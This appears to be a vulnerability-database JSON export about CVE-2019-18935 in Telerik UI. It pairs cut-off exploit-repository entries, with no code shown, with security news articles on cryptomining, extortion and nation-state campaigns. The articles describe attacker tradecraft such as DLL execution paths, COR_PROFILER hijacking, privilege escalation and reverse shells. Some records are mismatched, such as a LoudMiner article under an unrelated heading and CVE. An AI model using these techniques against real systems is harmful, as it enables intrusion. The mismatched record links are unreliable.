{"githubexploit": [{"lastseen": "2022-08-09T01:53:05", "description": "# CVE-2019-18935\n\nProof-of-concept exploit for a .NET JSON deser...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T07:58:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2022-08-08T17:58:54", "id": "A04C30E0-722D-5CF4-B80A-547C1C702024", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:15", "description": "# TelerikUI Python Scanner\r\n(telerik_rce_scan.py)\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, 
"published": "2020-08-26T20:57:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-07-21T15:53:50", "id": "92BBBF7B-026E-553A-883B-AEF503046C18", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:30:16", "description": "# TelerikUI Python Scanner\r\n(telerik_rce_scan.py)\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-25T08:37:51", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-08-17T19:04:54", "id": "05081BAE-6AEB-5206-8BEC-6D067EE4B660", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-29T23:42:45", "description": "# RAU_crypto\n[Virtual Studio Technology (VST) is an audio plug-in software interface that integrates software synthesizers and effects in digital audio workstations. The idea is to simulate traditional recording studio functions. ESET analysts recently uncovered a WordPress-based website hawking trojanized packages that incorporate the popular software, including Propellerhead Reason, Ableton Live, Reaktor 6, AutoTune and others. In all, there are 137 VST-related applications (42 for Windows and 95 for macOS) available for download on the site.\n\nUpon downloading, an unwitting audiophile\u2019s computer would be infected with LoudMiner, which consists of the VST application bundled with virtualization software, a Linux image and additional files used to achieve persistence. It uses the XMRig cryptominer hosted on a virtual machine. So far, three Mac versions and one Windows variant of the malware have been uncovered.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cRegarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production,\u201d wrote Michal Malik, researcher at ESET, [in a posting](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>) on Thursday. 
\u201cThus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users.\u201d\n\nBecause the victim would also get a functioning version of the application that they expected, the attackers gain some air cover.\n\n\u201cThese applications are usually complex, so it is not unexpected for them to be huge files,\u201d Malik explained. \u201cThe attackers use this to their advantage to camouflage their virtual machine (VM) images.\u201d\n\nDespite the efforts at camouflage, victims quickly become aware that something\u2019s amiss, thanks to system slowdowns, according to [forum postings](<https://discussions.apple.com/thread/8602989>).\n\n\u201cUnfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at the background causing this,\u201d said a user named \u201cMacloni.\u201d\n\n\u201cThe same user attached screenshots of the Activity Monitor indicating 2 processes \u2013 qemu-system-x86_64 and tools-service \u2013 taking 25 percent of CPU resources and running as root,\u201d said Malik, adding that some users found a full 100 percent of their CPU capacity hijacked.\n\n## Using a Virtual Machine\n\nLoudMiner uses QEMU on macOS and VirtualBox on Windows to connect to a Linux image running on a VM \u2013 more specifically, it\u2019s a Tiny Core Linux 9.0 image configured to run XMRig. 
The victim\u2019s machine is added to a mining pool that the Linux image uses for CPU power.\n\nMalik noted that the decision by the malware authors to use VMs for performing the mining instead of hosting it locally on the victim\u2019s computer is \u201cquite remarkable and this is not something we routinely see\u201d \u2013 although it\u2019s not unheard of for legitimate miners to [deploy the strategy](<https://medium.com/@Jayvdb/how-to-start-mining-cryptocurrency-for-fun-and-possibly-profit-71517859ed91>) to save money.\n\n\u201cUser downloads the application and follows attached instructions on how to install it. LoudMiner is installed first, the actual VST software after,\u201d he explained. \u201cLoudMiner hides itself and becomes persistent on reboot. The Linux virtual machine is launched and [the mining starts](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>). Scripts inside the virtual machine can contact the C2 server to update the miner.\u201d\n\nHe said that in order to identify a particular mining session, a file containing the IP address of the machine and the day\u2019s date is created by the \u201cidgenerator\u201d script and its output is sent to the C2 server by the \u201cupdater.sh script.\u201d\n\nBecause LoudMiner uses a mining pool, it\u2019s impossible to retrace potential transactions to find out how successful the adversaries have been thus far, he added.\n\nTo avoid the threat, age-old advice applies: Don\u2019t download pirated copies of commercial software. Malik also offered some hints to identify when an application contains unwanted code. 
Red flags include a trust popup from an unexpected, \u201cadditional\u201d installer; high CPU consumption by a process one did not install (QEMU or VirtualBox in this case); a new service added to the startup services list; and network connections to curious domain names (such as system-update[.]info or system-check[.]services).\n", "cvss3": {}, "published": "2019-06-20T19:53:23", "type": "threatpost", "title": "LoudMiner Cryptominer Uses Linux Image and Virtual Machines", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-06-20T19:53:23", "id": "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "href": "https://threatpost.com/loudminer-cryptominer-linux/145871/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T21:57:53", "description": "A researcher has created a proof-of-concept Metasploit module for the critical BlueKeep vulnerability, which successfully demonstrates how to achieve complete takeover of a target Windows machine.\n\nReverse engineer Z\u01dd\u0279osum0x0 [tweeted about his success](<https://twitter.com/zerosum0x0/status/1135866953996820480>) on Tuesday, noting that he plans to keep the module private given the danger that a working exploit could pose to the vast swathe of unpatched systems out there. He also released a video showing a remote code-execution (RCE) exploit working on a Windows 2008 desktop, paired with a Mimikatz tool to harvest login credentials. In about 22 seconds, he achieved full takeover.\n\n\u201cStill too dangerous to release, lame sorry,\u201d he tweeted. 
\u201cMaybe after first mega-worm?\u201d\n\nAn [earlier proof-of-concept (PoC) from McAfee](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) showed a successful RCE exploit, but didn\u2019t include the credential-harvesting \u2013 so a mitigating factor in that exploit would be the need for an attacker to bypass network-level authentication protections. \n[](<https://threatpost.com/newsletter-sign/>)The BlueKeep vulnerability (CVE-2019-0708) RCE flaw exists in Remote Desktop Services and impacts older version of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a [WannaCry-level, fast-moving infection wave](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).\n\nThe concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. It has also issued multiple follow-on advisories urging administrators to patch.\n\nThe new exploit works on most vulnerable machines, with the exception of Windows Server 2003, according to Z\u01dd\u0279osum0x0. The researcher [said that it took time](<https://twitter.com/zerosum0x0/status/1135219212199186434>) to develop the exploit, but clearly it can be achieved.\n\nThe National Security Agency concurs with the engineer on the possibility of widespread, in-the-wild exploitation.\n\n\u201cIt is likely only a matter of time before remote exploitation code is widely available for this vulnerability,\u201d the NSA said in [an advisory](<https://www.us-cert.gov/ncas/current-activity/2019/06/04/NSA-Releases-Advisory-BlueKeep-Vulnerability>) on Tuesday. 
\u201cNSA is concerned that malicious cyber-actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.\u201d\n\nThe danger isn\u2019t just the potential for a worm-wave; denial-of-service could be a problem too. Researchers attempting to create PoC exploits found that their efforts [largely caused systems to crash](<https://www.exploit-db.com/exploits/46946>) before they could achieve RCE.\n\nTo boot, the attack surface is unfortunately large. Although Microsoft issued a patch for the recently disclosed BlueKeep as part of its [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin (and there\u2019s a [micropatch](<https://0patch.com/patches.html>) out there too), [researchers said last week](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) that at least 1 million devices linked to the public internet are still vulnerable to the bug. 
And, the NSA in its advisory warned that the number could actually be in the multimillions.\n\nSome are finding patching to be an onerous process given that many older machines are in production environments where the required reboot \u2013 taking mission-critical systems offline \u2014 just isn\u2019t feasible.\n\n> But patch deployment will take 35 days and we cant deploy to 18.24% because downtime issues and we've raised the requests for the rest into the change tool and \u2026\u2026..\n> \n> \u2014 Taz Wake (@tazwake) [June 4, 2019](<https://twitter.com/tazwake/status/1135890835101368321?ref_src=twsrc%5Etfw>)\n\nNonetheless, with the demonstration that RCE can be achieved, hopefully administrators will find a way to update their environments.\n\n\u201cIt only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise,\u201d Microsoft warned in [an advisory](<https://blogs.technet.microsoft.com/msrc/2019/05/30/a-reminder-to-update-your-systems-to-prevent-a-worm/>). 
\u201cThis scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.\u201d\n", "cvss3": {}, "published": "2019-06-05T14:14:47", "type": "threatpost", "title": "BlueKeep 'Mega-Worm' Looms as Fresh PoC Shows Full System Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0708", "CVE-2019-18935"], "modified": "2019-06-05T14:14:47", "id": "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "href": "https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:25:29", "description": "A Monero cryptocurrency-mining campaign has emerged that exploits a known vulnerability in public-facing web applications built on the ASP.NET open-source web framework.\n\nThe campaign has been dubbed Blue Mockingbird by the analysts at Red Canary that discovered the activity. Research uncovered that the cybercriminal gang is exploiting a deserialization vulnerability, [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>), which can allow remote code execution. The bug is found in the Progress Telerik UI front-end offering for ASP.NET AJAX.\n\nAJAX stands for Asynchronous JavaScript and XML; It\u2019s used to add script to a webpage which is executed and processed by the browser. Progress Telerik UI is an overlay for controlling it on ASP.NET implementations.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability lies specifically in the RadAsyncUpload function, according to the writeup on the bug in the National Vulnerability Database. 
This is exploitable when the encryption keys are known (via another exploit or other attack), meaning that any campaign relies on a chaining of exploits.\n\nIn the current attacks, Blue Mockingbird attackers are uncovering unpatched versions of Telerik UI for ASP.NET, deploying the [XMRig Monero-mining payload](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) in dynamic-link library (DLL) form on Windows systems, then executing it and establishing persistence using multiple techniques. From there, the infection propagates laterally through the network.\n\nThe activity appears to stretch back to December, according to the analysis, and continued through April at least.\n\nXMRig is open-source and can be compiled into custom tooling, according to the analysis. Red Canary has observed three distinct execution paths: Execution with rundll32.exe explicitly calling the DLL export fackaaxv; execution using regsvr32.exe using the /s command-line option; and execution with the payload configured as a Windows Service DLL.\n\n\u201cEach payload comes compiled with a standard list of commonly used Monero-mining domains alongside a Monero wallet address,\u201d explained researchers at Red Canary, in a [Thursday writeup](<https://redcanary.com/blog/blue-mockingbird-cryptominer/>). \u201cSo far, we\u2019ve identified two wallet addresses used by Blue Mockingbird that are in active circulation. Due to the private nature of Monero, we cannot see the balance of these wallets to estimate their success.\u201d\n\nTo establish persistence, Blue Mockingbird actors must first elevate their privileges, which they do using various techniques; for instance, researchers observed them using a JuicyPotato exploit to escalate privileges from an IIS Application Pool Identity virtual account to the NT Authority\\SYSTEM account. 
In another instance, the Mimikatz tool (the official signed version) was used to access credentials for logon.\n\nArmed with the proper privileges, Blue Mockingbird leveraged multiple persistence techniques, including the use of a COR_PROFILER COM hijack to execute a malicious DLL and restore items removed by defenders, according to Red Canary.\n\n\u201cTo use COR_PROFILER, they used wmic.exe and Windows Registry modifications to set environment variables and specify a DLL payload,\u201d the writeup explained.\n\nBlue Mockingbird likes to move laterally to distribute mining payloads across an enterprise, added researchers. The attackers do this by using their elevated privileges and Remote Desktop Protocol (RDP) to access privileged systems, and then Windows Explorer to then distribute payloads to remote systems.\n\nAlthough Blue Mockingbird has been making noticeable waves, the toolkit is a work in progress.\n\n\u201cIn at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies for pivoting,\u201d said the researchers. \u201cThese tools included a fast reverse proxy (FRP), Secure Socket Funneling (SSF) and Venom. In one instance, the adversary also tinkered with PowerShell reverse TCP shells and a reverse shell in DLL form.\u201d\n\nIn terms of preventing the threat, patching web servers, web applications and dependencies of the applications to inhibit initial access is the best bet, according to Red Canary.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. 
Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-05-07T21:01:37", "type": "threatpost", "title": "Blue Mockingbird Monero-Mining Campaign Exploits Web Apps", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18935", "CVE-2020-5135"], "modified": "2020-05-07T21:01:37", "id": "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "href": "https://threatpost.com/blue-mockingbird-monero-mining/155581/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-13T11:25:12", "description": "In less time than it takes to get a stuffed crust pizza delivered, a new group called SnapMC can breach an organization\u2019s systems, steal their sensitive data, and demand payment to keep it from being published, according to a new [report from NCC Group\u2019s threat intelligence team](<https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/>) \u2014 no ransomware required.\n\nRather than disrupting business operations by locking down a target\u2019s data and systems, SnapMC just focuses on straight-up extortion. However, this low-tech, ransomware-free approach to extortion on a compressed timeline relies on known vulnerabilities with patches readily available.\n\n\u201cIn the extortion emails we have seen from SnapMC have given victims 24 hours to get in contact and 72 hours to negotiate,\u201d the report said. 
\u201cThese deadlines are rarely abided by, since we have seen the attacker to start increasing the pressure well before countdown hits zero.\u201d\n\nThe researchers weren\u2019t able to link the group to any known threat actors and gave it the name for its speed (\u201cSnap\u201d) and its mc.exe exfiltration tool of choice.\n\nAs evidence the group has the data, SnapMC provides victims with a list of the exfiltrated data. If they fail to engage in negotiations within the timeframe, the attackers threaten to publish the data and report the breach to customers and the media.\n\nAnalysts said they\u2019ve observed SnapMC successfully breaching unpatched and vulnerable VPNs using the [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) remote code execution bug in Telerik UI for ASPX.NET, and webserver apps using SQL injections.\n\n## **VPN Vulnerabilities **\n\nA recent rise in VPN vulnerabilities has left companies exposed, according to Hank Schless, a senior manager with Lookout cloud security.\n\n\u201cWhile VPN solutions have their place, there have been multiple stories of vulnerabilities within these solutions that were exploited in the wild,\u201d Schless explained to Threatpost. \u201cEnsuring that only authorized and secure users or devices can access corporate infrastructure requires zero trust network access (ZTNA) policies for on-premise or private apps and cloud access security broker (CASB) capabilities for cloud-based apps and infrastructure.\u201d\n\nLast June the Colonial Pipeline was breached with an [old VPN password](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>). 
And last July [SonicWall issued a patch](<https://threatpost.com/sonicwall-vpn-bugs-attack/167824/>) for a bug in its old VPN models no longer supported by the company after attacks came to light \u2014 which were part of an ongoing wider campaign to exploit ([CVE-2019-7418](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-7481>)).\n\nThe following month, [Cisco Systems issued a handful of patches](<https://threatpost.com/critical-cisco-bug-vpn-routers/168449/>) for the 8,800 Gigabit VPN routers vulnerable to compromise through [CVE-2021-1609](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1609>).\n\nAnd by late last month, the National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) issued guidance to the Department of Defense, National Security Systems and the Defense Industrial Base to [harden their VPNs](<https://threatpost.com/vpns-nsa-cisa-guidance/175150/>) against threats from multiple nation-state advanced persistent threat (APT) actors.\n\nNation-state actors aside, basic patching would protect against this latest smash-and-grab attempt at data extortion from the likes of SnapMC.\n\n## **Ransomware\u2019s Evolution **\n\nOliver Tavakoli, CTO with Vectra, said that getting rid of the encryption piece of the attack altogether is a \u201cnatural evolution\u201d of the ransomware [business model](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>). The NCC team likewise predicts the trend toward simple attacks on shorter timelines is likely to continue.\n\n\u201cNCC Group\u2019s Threat Intelligence team predicts that data-breach extortion attacks will increase over time, as it takes less time, and even less technical in-depth knowledge or skill in comparison to a full-blown ransomware attack,\u201d the team said. 
\u201cTherefore, making sure you are able to detect such attacks in combination with having an incident response plan ready to execute at short notice, is vital to efficiently and effectively mitigate the threat SnapMC poses to your organization.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online **_](<https://threatpost.com/category/webinars/>)_**_town halls_**__** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-13T11:22:00", "type": "threatpost", "title": "30 Mins or Less: Rapid Attacks Extort Orgs Without Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935", "CVE-2019-7418", "CVE-2021-1609"], "modified": "2021-10-13T11:22:00", "id": "THREATPOST:7EE86D3945B51C9DF608A4C06739A5F7", "href": "https://threatpost.com/rapid-attacks-extort-ransomware/175445/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-07T21:58:06", "description": "A high-severity bug has been found that allows remote attackers to hijack 
Cisco\u2019s enterprise-class Industrial Network Director. The vulnerability was made public Wednesday along with a patch; there are no workarounds for the bug and [a software patch is required](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-ind-rce>), Cisco said.\n\nCisco\u2019s Industrial Network Director is a network management platform for visualizing industrial assets, and securing and managing them.\n\n\u201cThe vulnerability (CVE-2019-1861) is due to improper validation of files uploaded to the affected application,\u201d [Cisco wrote in its security advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-ind-rce>). \u201cAn attacker could exploit this vulnerability by authenticating to the affected system using administrator privileges and uploading an arbitrary file. A successful exploit could allow the attacker to execute arbitrary code with elevated privileges.\u201d \n[](<https://threatpost.com/newsletter-sign/>)\n\nImpacted are versions of Industrial Network Director prior to the 1.6.0 release.\n\n## Additional High-Severity Bugs\n\nOn Wednesday Cisco also released a fix for an additional high-severity flaw found in TelePresence VCS and multiple releases of its Unified Communications Manager (versions X8.1 to X12.5.2) products.\n\n\u201cA vulnerability in the authentication service of the Cisco Unified Communications Manager IM and Presence (Unified CM IM&P) Service, Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway Series could allow an unauthenticated, remote attacker to cause a service outage for users attempting to authenticate, resulting in a denial of service condition,\u201d Cisco [wrote in its advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-cucm-imp-dos>) on the bug (CVE-2019-1845).\n\nThe vulnerability traces back to insufficient controls for specific memory operations, it 
said.\n\nMeanwhile, on Monday, Cisco also [released an update to a high-severity denial-of-service vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-iosxr-evpn-dos>) (CVE-2019-1849), originally made public on May 15.\n\nCisco said this bug impacts routers running a vulnerable release of Cisco IOS XR Software and that are participating in a Border Gateway Protocol (BGP) Multiprotocol Label Switching (MPLS)-based Ethernet VPN (EVPN).\n\n\u201c[An] implementation of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to trigger a denial-of-service condition on an affected device,\u201d Cisco wrote.\n\nAnd also of note, on Thursday Cisco released a patch for a [medium-severity remote file injection bug](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-cuic-cmdinj>) (CVE-2019-1860). On Wednesday it released patches for an [additional seven medium-severity vulnerabilities](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir#~Vulnerabilities>).\n\nLast month, Cisco had an unusually busy patching month, tackling everything from a critical vulnerability in the [Cisco Elastic Services Controller](<https://threatpost.com/critical-flaw-in-cisco-elastic-services-controller-allows-full-system-takeover/144452/>), [a high-severity bug](<https://threatpost.com/cisco-bugs-unpatched-millions-devices/144692/>) in its web-based user interface (Web UI) of the Cisco IOS XE Software and [a flaw in the Secure Boot trusted hardware root-of-trust](<https://threatpost.com/cisco-patch-firmware/144936/>) affecting several model routers, switches and firewalls \u2014 this latter bug is still not patched for many of the millions of devices it affects.\n\n**_Ransomware is on the rise: _****_[Don\u2019t miss our free Threatpost webinar ](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)_****_on the ransomware threat 
landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost_****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "cvss3": {}, "published": "2019-06-06T17:43:57", "type": "threatpost", "title": "High-Severity Bug in Cisco Industrial Enterprise Tool Allows RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1845", "CVE-2019-1849", "CVE-2019-1860", "CVE-2019-1861", "CVE-2019-18935"], "modified": "2019-06-06T17:43:57", "id": "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "href": "https://threatpost.com/cisco-high-severity-bugs/145446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T15:51:14", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened 
activity.[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. 
